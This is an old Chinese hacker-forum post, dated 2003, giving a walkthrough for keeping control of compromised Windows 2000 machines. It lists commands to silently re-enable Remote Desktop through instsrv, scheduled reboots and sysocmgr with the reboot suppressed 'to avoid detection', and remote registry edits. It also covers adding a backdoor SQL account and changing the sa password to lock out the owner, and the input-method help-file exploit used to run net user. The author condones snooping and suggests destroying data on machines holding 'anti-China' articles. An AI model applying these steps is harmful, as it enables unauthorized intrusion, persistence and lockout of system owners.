| [这个贴子最后由孤独浪子在 2003/05/04 01:31pm 编辑]
我想大家对肉鸡很感兴趣,有些朋友也向我要肉鸡,但得到肉鸡后怎么办?这对一些新手来说又是一个难题,就打比方说我们有个3389的肉鸡(需要对方的防火墙关闭或是杀死防火墙的进程)
有些人有格式化对方硬盘的习惯,这样很不好,我的建议就是,上了以后到处看看可以,但别太过分,除非你发现他电脑中有关于反华的文章。
对于win2000,很多人进去都喜欢使用“net start TermService”,一般由于该服务被禁用,是开启不成功的,所以这办法不一定能成功,我想也没几个网管那么菜。
我们会用Windows 2000下的Resource Kits中的一个工具instsrv创建一个服务,instsrv的用法如下,当然,你也可以用其他的工具来实现(如srvinstw,GUI方式的)。
C:\>instsrv
Installs and removes system services from NT
INSTSRV ( | REMOVE)
[-a ] [-p ]
Install service example:
INSTSRV MyService C:\MyDir\DiskService.Exe
-OR-
INSTSRV MyService C:\mailsrv\mailsrv.exe -a MYDOMAIN\joebob -p foo
Remove service example:
INSTSRV MyService REMOVE
好了,接下来就请大家看清楚:
先instsrv TermService REMOVE然后给他再装上终端服务instsrv Winlogonservice c:\winnt\system32\termsrv.exe
其他的不要管,只要c:\winnt\system32\termsrv.exe存在,就可以给他装上一个叫做Winlogonservice的服务。
我们可以送他一个reboot.exe给他,然后用at \\xxx.xxx.xxx.xxx 23:30 reboot.exe
这样他因为我的指令而从起后就能连接他的3389了。
对于对方将其远程终端设置为禁止的计算机 我们可以使用win2000无人职守工具sysocmgr.exe:
echo [Components] > c:\bootlog.txt
echo TSEnabled = on >> c:\bootlog.txt
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q
sysocmgr的用法请自己到命令行下输入 sysocmgr[回车] 看看帮助,写得很清楚,上面的参数大致不变;如果你不想对方马上重启,输入 /r 选项,拟制重启(防止被发现):
sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\bootlog.txt /q /r
修改对方服务设置或者直接修改注册表(成功率相对较低)
1、在regedit中菜单“注册表”-“连接网络注册表”HKEY_LOCAL_MACHINE-SYSTEM-CurrentControlSet-Services-Termservice,将start键值修改为2-然后退出regedit
想办法让对方机器重启(reboot.exe不错)
2、我的电脑-管理-服务-Terminal Services-属性-自动-确定-启动Terminal Services(70%以上的成功率)
进入肉鸡后,请大家帮助升级,打补丁(做点好事,也是为自己单独享用此肉鸡而服务),然后它就听你一个人的指挥了。
对于sa弱密码进入系统的菜客,记得到 开始-程序-mssql server->enterprise management-。。。。-security-logins里面给自己加个帐户,最好不是DBO的,当然权限和sa相同,然后修改sa密码。这样就完全让他死心塌地的爱你一个人了 :)
3389连接目标的时候,点击服务器地址栏,点击任务栏输入法,选择清华紫光或是微软拼音什么的可以打开帮助文件的就可以
连接到3389服务器,如果对方刚好有这个输入法,那么就用输入法漏洞利用方法一样(差别是有的,关键在:找到什么地方有“打开文件”或者“保存文件”对话框出现);
2)漏洞存在的原因及解决思路:
鉴于第三方输入法都是系统及相关应用软件(SQL server 、IIS、补丁等)装好后才考虑的事情,这个帮助文件一般也不是放在%systemroot%\help下面,所以删除这个目录下面的win*是没有用的,必须到安装目录去删除.cnt或者*.hlp文件才行。
说得科学一点是这样:第三方软件设计缺陷导致系统出现漏洞;说得玄乎一点就是系统打不打补丁都一样能黑。由于第三方软件不在MS Service pack范围内,当然与sp 无关。
小道消息
这是输入法漏洞利用的延伸,我听黑盟一个人说过他利用清华紫光的这个帮助里面的“添加打印机”然后弹出的”保存文件“对话框内,找个可执行文件,右键点击-“建立快捷方式”-快捷方式“属性”=net user ......-》确定-右键点击-打开(也就是执行)成功进入过一些机器。,效果也很好。
孤独浪子也就是本站的孤独无悔
|
